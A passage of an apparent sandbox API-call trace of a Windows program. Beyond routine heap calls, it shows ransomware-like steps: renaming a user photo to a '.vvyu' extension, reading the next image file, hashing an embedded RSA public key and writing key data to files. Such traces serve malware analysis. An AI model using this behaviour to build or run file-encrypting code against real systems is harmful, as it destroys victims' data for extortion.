0x2c78a40 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3470 [0201.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34d0 [0201.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34e8 [0201.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3488 [0201.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3458 [0201.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0201.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fd68 | out: hHeap=0x620000) returned 1 [0201.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.400] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x11a92, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x11a92, lpOverlapped=0x0) returned 1 [0201.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.402] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x11a97, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.402] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.403] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.404] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.404] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.404] CloseHandle (hObject=0x510) returned 1 [0201.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0201.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.407] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\5DS0X1cGBS4n2igZsE.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\5ds0x1cgbs4n2igzse.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\5DS0X1cGBS4n2igZsE.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\5ds0x1cgbs4n2igzse.jpg.vvyu")) returned 1 [0201.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.409] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0201.412] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4bf440, ftCreationTime.dwHighDateTime=0x1d8a3da, ftLastAccessTime.dwLowDateTime=0x6ac30ed0, ftLastAccessTime.dwHighDateTime=0x1d8a6d6, ftLastWriteTime.dwLowDateTime=0x6ac30ed0, ftLastWriteTime.dwHighDateTime=0x1d8a6d6, nFileSizeHigh=0x0, nFileSizeLow=0xe2ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9VRBBaa2E6cjsKGlie.gif", cAlternateFileName="9VRBBA~1.GIF")) returned 1 [0201.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0201.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.412] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\9VRBBaa2E6cjsKGlie.gif") returned=".gif" [0201.413] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\9VRBBaa2E6cjsKGlie.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\9vrbbaa2e6cjskglie.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.414] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=58030) returned 1 [0201.414] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.417] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xe288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.417] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.419] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.419] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xe2ae, lpOverlapped=0x0) returned 1 [0201.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.421] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c278) returned 1 [0201.422] CryptCreateHash (in: hProv=0x67c278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.422] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.422] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.422] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.422] GetLastError () returned 0x0 [0201.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.422] GetLastError () returned 0x0 [0201.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.423] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.423] CryptReleaseContext (hProv=0x67c278, dwFlags=0x0) returned 1 [0201.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.423] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.423] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.423] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe2b0) returned 0x2ea99b0 [0201.424] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fd68 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fdb0 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.425] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0201.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3488 [0201.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3470 [0201.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0201.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0201.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0201.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.428] GetCurrentThreadId () returned 0x66c [0201.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea87d8 [0201.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.429] RtlAllocateHeap 